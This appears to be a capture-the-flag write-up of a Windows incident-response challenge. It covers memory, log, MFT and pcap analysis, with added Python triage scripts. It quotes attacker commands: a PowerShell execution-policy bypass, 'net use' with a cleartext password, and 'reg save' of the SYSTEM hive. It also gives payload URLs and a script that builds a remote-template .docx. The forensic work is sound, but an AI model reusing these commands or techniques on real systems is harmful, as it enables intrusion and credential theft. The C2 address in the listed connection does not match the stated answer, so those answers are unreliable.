This is a write-up of the CyberCorp Case 1 challenge by CyberDefenders. The challenge can be found here.
CyberCorp has been informed that its infrastructure is likely compromised, as there are a number of anomalies in its outgoing traffic. The anomalies suggest that a known threat group is behind this attack.
CyberCorp’s cybersecurity team isolated one of the potentially compromised hosts from the corporate network and collected the artifacts necessary for the investigation: a memory dump, OS event logs, registry files, Prefetch files, the $MFT file, ShimCache, AmCache and network traffic dumps. You will have to analyze the collected artifacts and answer the questions to complete the investigation.
Tools used for this challenge
Question 1 - What is the build number (in the format ddddd, where each d is a single decimal number, for example - 12345) of the installed Windows version?
Every Windows version since Windows 2000 stores product version information in the registry. To view it, open the collected SOFTWARE hive in a tool like Registry Explorer.
The product version information, including the build number, is stored under the following key of the SOFTWARE hive (HKEY_LOCAL_MACHINE\SOFTWARE on the live system): Microsoft\Windows NT\CurrentVersion
As shown below, this key provides product version information, including the build number (the CurrentBuild value; the revision is in UBR).
The CurrentBuild value is 17134, which corresponds to Windows 10 version 1803.
Question 2 - What is the parent process PID of the process, that accepts incoming network connections on the port 1900/UDP?
To answer this question I used Volatility 2.7 to find the process that owns the listening socket and to determine its parent.
Before running Volatility commands, a profile matching the memory image is needed. The imageinfo plugin suggests candidate profiles (this is only a heuristic: if later plugins return garbage, try the other suggested profiles or kdbgscan):
vol.py -f memdump.mem imageinfo
Now that we have the profile, the netscan plugin lists all sockets and connections found in the image. grep was used to filter the output on port 1900; note that the pattern :1900 also matches ports such as 19001, so check the Local Address column of each hit.
vol.py -f memdump.mem --profile=Win10x64_17134 netscan | grep :1900
All sockets on port 1900 belong to svchost.exe with PID 4688. The parent process can be found with the pstree plugin, which displays the process listing as a tree. A grep filter was used to find the process with PID 4688 (this also matches any other line containing 4688, such as an offset or handle count, so verify the Pid column):
vol.py -f memdump.mem --profile=Win10x64_17134 pstree | grep 4688
The output of this command shows that the parent process of svchost.exe is PID 648. For a legitimate service host the parent is services.exe, so it is worth confirming that PID 648 is indeed services.exe.
Question 3 - What is the IP address of the attacker command and control center, the connection with which was still active at the time of forensic artifacts acquisition?
While scrolling through the netscan output, the following ESTABLISHED connection stood out:
TCPv4 192.168.184.130:50133 22.214.171.124:443 ESTABLISHED -1
A PID of -1 means netscan could not attribute the socket to a process (typically because the owning process has exited or its process object could not be resolved), so the connection cannot be tied to a process from this output alone. This connection, combined with an entry in the Windows event log shown below, made it clear that the answer was: 126.96.36.199
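Doing the port-to-parent lookup of question 2 and the unattributed-connection check of question 3 with a script rather than grep, as an added example that is not part of the original write-up: the Volatility 2 netscan and pstree text below is constructed to imitate the plugins' column layout (it is not the challenge's real output), and the PIDs, names and addresses are taken from this write-up where it names them and made up otherwise. The parser matches the port exactly, so a TCP listener on 19001 is not mistaken for 1900, and walks the parent chain from pstree.

```python
import re

# Constructed sample of Volatility 2 "netscan" output, imitating its column layout.
# Not the real output from the challenge's memory image. UDP rows have an empty
# State column, so splitting on whitespace shifts the columns: use a regex instead.
NETSCAN_SAMPLE = """\
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0xe00000a1b2c3d0   UDPv4    0.0.0.0:1900                   *:*                                   4688     svchost.exe    2020-06-21 09:10:11 UTC+0000
0xe00000a1b2c3e0   UDPv6    ::1:1900                       *:*                                   4688     svchost.exe    2020-06-21 09:10:11 UTC+0000
0xe00000a1b2c3f0   TCPv4    0.0.0.0:19001                  0.0.0.0:0            LISTENING        900      svchost.exe
0xe00000a1b2c400   TCPv4    192.168.184.130:50133          22.214.171.124:443   ESTABLISHED      -1
"""

# Constructed sample of Volatility 2 "pstree" output (leading dots encode tree depth).
# Offsets and the upper part of the tree are made up; 4688 -> 648 is from the write-up.
PSTREE_SAMPLE = """\
Name                                                  Pid   PPid   Thds   Hnds Time
------------------------------------------------------ ------ ------ ------ ------ ----
 0xffffe0000e1a2040:System                               4      0    130      0 2020-06-21 09:09:50 UTC+0000
. 0xffffe0000f4b3080:smss.exe                          296      4      2      0 2020-06-21 09:09:50 UTC+0000
 0xffffe0000f9c4080:wininit.exe                        576    488      1      0 2020-06-21 09:09:55 UTC+0000
. 0xffffe0000fab5080:services.exe                      648    576      6      0 2020-06-21 09:09:56 UTC+0000
.. 0xffffe000102c6080:svchost.exe                     4688    648     12      0 2020-06-21 09:10:11 UTC+0000
"""

NETSCAN_RE = re.compile(
    r"^(?P<offset>0x[0-9a-fA-F]+)\s+(?P<proto>[TU][CD]Pv[46])\s+"
    r"(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>-?\d+)(?:\s+(?P<owner>\S+))?"
)
PSTREE_RE = re.compile(
    r"^(?P<depth>\.*)\s*0x[0-9a-fA-F]+:(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)"
)


def parse_netscan(text):
    """One dict per socket/connection row; the header line does not match the regex."""
    rows = []
    for line in text.splitlines():
        m = NETSCAN_RE.match(line)
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            row["port"] = int(row["local"].rsplit(":", 1)[1])  # rsplit also works for IPv6
            rows.append(row)
    return rows


def parse_pstree(text):
    """Map pid -> {"name", "ppid"}; the dot prefix (tree depth) is not needed."""
    procs = {}
    for line in text.splitlines():
        m = PSTREE_RE.match(line)
        if m:
            procs[int(m["pid"])] = {"name": m["name"], "ppid": int(m["ppid"])}
    return procs


def pids_listening_on(rows, port, proto="UDP"):
    """PIDs with a socket bound to exactly `port` on the given family (unlike grep ':1900')."""
    return {r["pid"] for r in rows if r["proto"].startswith(proto) and r["port"] == port}


def unattributed_established(rows):
    """ESTABLISHED connections netscan could not tie to a process (Pid -1), question 3's case."""
    return [(r["local"], r["foreign"]) for r in rows if r["state"] == "ESTABLISHED" and r["pid"] == -1]


def parent_pid(procs, pid):
    return procs[pid]["ppid"] if pid in procs else None


def ancestry(procs, pid):
    """[(pid, name), (parent pid, name), ...] up to the last process pstree knows; cycle-safe."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append((pid, procs[pid]["name"]))
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    rows, procs = parse_netscan(NETSCAN_SAMPLE), parse_pstree(PSTREE_SAMPLE)
    for pid in sorted(pids_listening_on(rows, 1900)):
        print(pid, "->", ancestry(procs, pid))
    print("unattributed:", unattributed_established(rows))
```

On a real image, feed the plugin output in via subprocess or a saved text file; the regexes only depend on the column layout, not on the sample values.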
Question 4 - What is the PID of the process where malicious code was located at the moment of forensic artifacts acquisition?
To answer this question the pstree output was analysed and some interesting processes were identified. Those processes were spawned by winlogon.exe, which normally starts only a small, well-known set of children.
This, combined with malicious code being embedded in the process, made me think this was the correct answer. The check a practitioner would add here is the malfind plugin, which lists private memory regions with PAGE_EXECUTE_READWRITE protection and dumps their first bytes; injected shellcode or a reflectively loaded PE in winlogon.exe shows up there.
The PID of winlogon.exe was the correct answer.
Question 5 - On a compromised system, malicious code, discovered in the previous step, is launched every system start, since the attacker has used one of the persistence techniques. So, what is the name of the autostart entry (that part which is directly responsible for code execution), used by the attacker for persistence?
This question took me some time. I looked at all sorts of persistence techniques but forgot about WMI. While analysing the Windows event logs I noticed processes being created (Event ID 4688) with the following command line:
powershell.exe -noP -ep bypass iex -c \"('C:\\Users\\john.goldberg\\AppData\\Roaming\\Microsoft\\Office\\Recent\\tmpA7Z2.ps1')
Looking deeper into this, I noticed a WMI CommandLineEventConsumer named LogRotate Consumer using the same command line. The switches matter: -noP skips the user profile, -ep bypass disables the execution policy and iex (Invoke-Expression) runs whatever the staged .ps1 file contains.
As shown in the picture above, the script is launched every time the user logs on: the consumer is tied by a __FilterToConsumerBinding to an __EventFilter that fires on the logon. This technique was used by the adversary to maintain persistence on the system; on a live host these three classes in the root\subscription namespace are where to look for it.
Question 6 - The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. This code is extracted by script from some system place in the encoded form. The decoded value of this string is executable PE-file. How did Microsoft Antivirus detect this file on 2020-06-21?
This question was easy after completing question 8. The MD5 hash of the decoded PE file was calculated and looked up on VirusTotal.
VirusTotal shows that Microsoft detects this file as Trojan:Win64/Meterpreter.E. Detection names change over time, so when a question asks for the verdict on a specific date, check the analysis history on VirusTotal for that date rather than relying on the latest scan.
Question 7 - The process, mentioned in the question 4, isn’t the initial process, where malicious code, described in the previous question, was executed by script from autostart. What is the name of the initial process (in the format program.exe), that is spawned by autostart script and used for further malicious code execution, that subsequently migrates to the address space of the process, mentioned in the question 4.
Looking back at the pstree output from question 4, dwm.exe was identified as the answer: the payload first ran in dwm.exe and then migrated into winlogon.exe, which is why the injected code was found there.
Question 8 - The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process discussed in question 4. This script (the one that runs at each system start, described in question 6) was downloaded to the compromised system from the Internet during the host compromise. Provide the URL that was used to download it.
While working on question 11, a file named Supplement.dotm was found. To recover it, the filescan plugin was used to search for .dotm files; once the file object's offset was known, it was dumped with the dumpfiles plugin.
This left me with a .dat file (the data-section view of the cached file; dumpfiles can also produce .img and .vacb views, so if one is truncated or unparsable try the others). I ran olevba, an oletools script that parses OLE and OpenXML files such as MS Office documents (Word, Excel) and extracts VBA macro code in clear text. Part of the output is shown in the picture below.
The output contained the answer to this question: https[:]//raw.githubusercontent[.]com/xia33F/APT/master/payloads/wrapper_page
Question 9 - The system was compromised as the result of a Microsoft Office document opening, received by email. What is MD5 hash of this document (for example, d41d8cd98f00b204e9800998ecf8427e)?
I started by looking for document files with the filescan plugin in Volatility, which gave the results below:
I assumed it would be one of the above files. But how do I obtain them in order to calculate the hash value? This took a bit to figure out: the network capture is the cleanest source, because the e-mail and its attachment are in the pcap exactly as they were received.
In Wireshark, all EML files were exported via File > Export Objects > IMF as shown in the picture below. All exported EML files were analysed and one e-mail (Oil Market current state.EML) had a zip file attached to it.
The base64-encoded block for the zip file was copied out of the attachment's MIME part of the e-mail, decoded with CyberChef and the output saved to a file. After changing the output file's extension to .zip, I was able to extract its contents. This zip file contained a file named Why Saudi Arabia Will Lose The Next Oil Price Was.docx.
Next, PowerShell was used to calculate the MD5 hash of this file (hash the extracted .docx itself, not the zip or the EML):
Get-FileHash -Algorithm md5 'Why Saudi Arabia Will Lose The Next Oil Price Was.docx'
This gave the answer to this question: aa7ee7f712780aebe9136cabc24bf875
Question 10 - The document, that was initially opened by user, didn’t contain anything malicious itself. It downloaded another document from the Internet as a Microsoft Word template. Malicious code, which has led to the system compromise, is located inside this template directly. What link was used by the first document to download the second document as a template (for example, https://address/file.com)?
After extracting the document in question 9, oletools were run against it (oleobj reports external relationships such as an attached template). This returned the answer: http[:]//75.19.45[.]11/Supplement.dotm. The link lives in the document's word/_rels/settings.xml.rels as a Relationship of type attachedTemplate with TargetMode="External", which Word fetches when the document is opened; that is why the .docx itself contains no macro.
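Questions 9 and 10 can be answered in one pass over the EML: extract the attachment, hash the document inside the zip and read the external attachedTemplate relationship out of the .docx. The Python below is an added example, not the author's workflow or a tool from the challenge: the e-mail, the zip and the minimal .docx are all constructed in memory (sender, recipient and the zip name are made up; the document name and template link are the ones named in this write-up), and the script then parses them exactly as it would a real exported EML.

```python
import email
import hashlib
import io
import zipfile
from email import policy
from email.message import EmailMessage
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"
TEMPLATE_URL = "http://75.19.45.11/Supplement.dotm"  # the link named in question 10
DOC_NAME = "Why Saudi Arabia Will Lose The Next Oil Price Was.docx"
FIXED_TIME = (2020, 6, 21, 0, 0, 0)  # fixed zip timestamps keep the constructed bytes stable


def zip_of(entries):
    """In-memory zip (stored, fixed timestamps) from {name: bytes or str}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(zipfile.ZipInfo(name, FIXED_TIME), data)
    return buf.getvalue()


def build_docx_with_remote_template(url):
    """Constructed minimal .docx whose settings part points at an external template
    (the remote-template technique of question 10). Not the challenge's document."""
    return zip_of({
        "[Content_Types].xml": '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/document.xml": f'<?xml version="1.0"?><w:document xmlns:w="{W_NS}"><w:body/></w:document>',
        "word/settings.xml": f'<?xml version="1.0"?><w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:attachedTemplate r:id="rId1"/></w:settings>',
        "word/_rels/settings.xml.rels": (
            f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{url}" TargetMode="External"/></Relationships>'),
    })


def build_eml(attachment_name, attachment_bytes):
    """Constructed phishing mail carrying the zip as a base64 attachment (addresses are made up)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "john.goldberg@example.invalid"
    msg["Subject"] = "Oil Market current state"
    msg.set_content("Please see the attached report.")
    msg.add_attachment(attachment_bytes, maintype="application", subtype="zip", filename=attachment_name)
    return msg.as_bytes()


def attachments(eml_bytes):
    """(filename, decoded bytes) for each attachment part; the email module undoes the base64."""
    msg = email.message_from_bytes(eml_bytes, policy=policy.default)
    return [(p.get_filename(), p.get_payload(decode=True)) for p in msg.iter_attachments()]


def external_relationships(ooxml_bytes):
    """(rels part, relationship type, target) for every TargetMode="External" relationship:
    attached templates, linked images, OLE links and similar remote fetches."""
    found = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                for rel in ET.fromstring(z.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        found.append((name, rel.get("Type").rsplit("/", 1)[-1], rel.get("Target")))
    return found


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def triage_eml(eml_bytes):
    """For each zip attachment, hash every Office document inside it and list its external links."""
    results = []
    for att_name, data in attachments(eml_bytes):
        if not data.startswith(b"PK"):  # only zip containers (a bare .docx is a zip too)
            continue
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for inner in z.namelist():
                if inner.lower().endswith((".docx", ".docm", ".dotx", ".dotm")):
                    doc = z.read(inner)
                    results.append({"attachment": att_name, "document": inner,
                                    "md5": md5_hex(doc), "external": external_relationships(doc)})
    return results


def demo():
    docx = build_docx_with_remote_template(TEMPLATE_URL)
    eml = build_eml("report.zip", zip_of({DOC_NAME: docx}))  # "report.zip" is a made-up name
    return triage_eml(eml)


if __name__ == "__main__":
    for r in demo():
        print(r["document"], r["md5"], r["external"])
```

To run it against a real export, replace the demo() input with the bytes of the EML written by Wireshark; the MD5 is taken over the document bytes exactly as stored in the zip, which is what the challenge asks for.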
Question 11 - During the post-exploitation attacker delivered to the compromised host a special Active Directory Enumeration utility. Which link did the attacker use to download this utility (for example, https://address/file.com)?
The answer to this question was found with a bit of luck. At the start of this challenge I noticed the Windows event logs in the evidence directory, and the first thing I did was run Chainsaw against them. Lately I have been using this tool a lot during IR investigations and would highly recommend it to anyone.
As shown in the picture above, the adversary used http://188.8.131.52/disco.jpg to download the utility. The .jpg extension is only a disguise: the type of the downloaded content, not the URL, determines what it is.
Question 12 - As described in the previous question utility has created several files in the compromised system, that subsequently were deleted by an attacker. One of the created files had a bin extension. What is the name of this file (for example, name.bin)?
To answer this question the Master File Table ($MFT) was analysed, since it holds a record for every file on an NTFS volume, and the records of deleted files survive until they are reused. The $MFT was parsed with Eric Zimmerman's MFTECmd. Next, a filter on the .bin extension was applied and, while scrolling through the results, a strange file name was found in the temp directory.
Question 13 - During the post-exploitation attacker has compromised a privileged user account. What is its password?
As described earlier, Chainsaw was used to analyse the Windows event logs. Its output shows the use of net use, the Command Prompt command used to connect to, remove and configure connections to shared resources such as mapped drives and network printers. Because process-creation auditing with command-line logging was enabled, the full argument list is recorded in the 4688 event, including a password passed on the command line.
In this command the password is shown: !!feb15th2k6!!
Question 14 - What is the name of the tool (for example, program.exe), that probably was used by an attacker to compromise the user account?
The attacker used reg.exe to compromise the user account: the SYSTEM registry hive was saved to C:\Windows\TEMP\sa.tmp. The SYSTEM hive holds the boot key that protects the hashes in SAM and the secrets (including cached domain credentials) in SECURITY, so saving these hives lets an attacker recover credentials offline.
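The 4688 findings of questions 5, 13 and 14 (a PowerShell launch with -noP -ep bypass and iex, a net use with a cleartext password, and a reg save of a credential hive) are all visible in the command-line field of process-creation events, so they can be triaged with one script. The Python below is an added example, not Chainsaw's logic or the author's: the event records are constructed to resemble parsed 4688 fields (the account cybercorp\admin and the C$ share are made up; the other strings mirror what this write-up quotes), and each check returns a structured finding rather than a grep hit.

```python
import re

# Constructed process-creation records (Security Event ID 4688 fields as parsed from EVTX),
# not the challenge's real log. Account cybercorp\admin and the C$ share are made up.
EVENTS_4688 = [
    {"EventID": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"EventID": 4688, "SubjectUserName": "john.goldberg",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell.exe -noP -ep bypass iex -c "('C:\Users\john.goldberg\AppData\Roaming\Microsoft\Office\Recent\tmpA7Z2.ps1')"'''},
    {"EventID": 4688, "SubjectUserName": "john.goldberg",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\192.168.184.100\C$ !!feb15th2k6!! /user:cybercorp\admin"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SYSTEM C:\Windows\TEMP\sa.tmp"},
    {"EventID": 4624, "SubjectUserName": "john.goldberg", "NewProcessName": "", "CommandLine": ""},
]

# PowerShell launch indicators; one alone is common in admin scripts, two or more is worth a look.
PS_INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-(?:ep|exec|executionpolicy)\s+bypass"), "ExecutionPolicy Bypass"),
    (re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), "NoProfile"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "Invoke-Expression"),
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "EncodedCommand"),
    (re.compile(r"(?i)\\AppData\\Roaming\\Microsoft\\Office\\Recent\\[\w.-]+\.ps1"), "script staged under Office\\Recent"),
]
# reg save of one of the three hives needed for offline credential extraction.
REG_SAVE_RE = re.compile(r'(?i)\breg(?:\.exe)?"?\s+save\s+"?(?P<hive>hklm\\(?:sam|system|security))"?\s+"?(?P<out>[^"]+)"?')


def parse_net_use(cmdline):
    """Target, user and password from a `net use` command line, or None if it is not one.
    The password may come before or after /user:, and `*` means 'prompt', not a credential."""
    tokens = cmdline.split()
    if len(tokens) < 2 or tokens[1].lower() != "use":
        return None
    exe = tokens[0].strip('"').lower()
    if exe not in ("net", "net.exe", "net1", "net1.exe") and not exe.endswith(("\\net.exe", "\\net1.exe")):
        return None
    info = {"target": None, "user": None, "password": None}
    for tok in tokens[2:]:
        if tok.lower().startswith("/user:"):
            info["user"] = tok[len("/user:"):]
        elif tok.startswith("/") or re.fullmatch(r"[A-Za-z]:", tok):
            continue  # other switches (/persistent:no, /delete) and drive letters
        elif tok.startswith("\\\\") and info["target"] is None:
            info["target"] = tok
        elif tok != "*" and info["password"] is None:
            info["password"] = tok
    return info


def unc_host(target):
    """\\\\host\\share -> host (the Domain Controller address in question 15)."""
    return target.lstrip("\\").split("\\")[0] if target else None


def triage_4688(events):
    """Run the three checks over 4688 records and return structured findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        cmd, image = ev.get("CommandLine", ""), ev.get("NewProcessName", "").lower()
        if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
            hits = [label for rx, label in PS_INDICATORS if rx.search(cmd)]
            if len(hits) >= 2:
                findings.append({"kind": "suspicious-powershell", "user": ev.get("SubjectUserName"),
                                 "indicators": hits, "cmd": cmd})
        nu = parse_net_use(cmd)
        if nu and nu["password"]:
            findings.append({"kind": "cleartext-credential", "host": unc_host(nu["target"]),
                             "user": nu["user"], "password": nu["password"], "cmd": cmd})
        m = REG_SAVE_RE.search(cmd)
        if m:
            findings.append({"kind": "credential-hive-dump", "hive": m["hive"].upper(),
                             "output": m["out"], "cmd": cmd})
    return findings


if __name__ == "__main__":
    for f in triage_4688(EVENTS_4688):
        print(f["kind"], {k: v for k, v in f.items() if k not in ("kind", "cmd")})
```

The records can come from any EVTX parser that exposes the event fields by name; the checks only read EventID, NewProcessName, SubjectUserName and CommandLine, and CommandLine is present only when "Include command line in process creation events" was enabled on the host.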
Question 15 - The attacker used a compromised account for unauthorized Domain Controller access. What is the IP address of this Domain Controller?
The answer to this question was already visible in the net use command from question 13: the share the attacker connected to is on the Domain Controller.
The answer is 192.168.184.100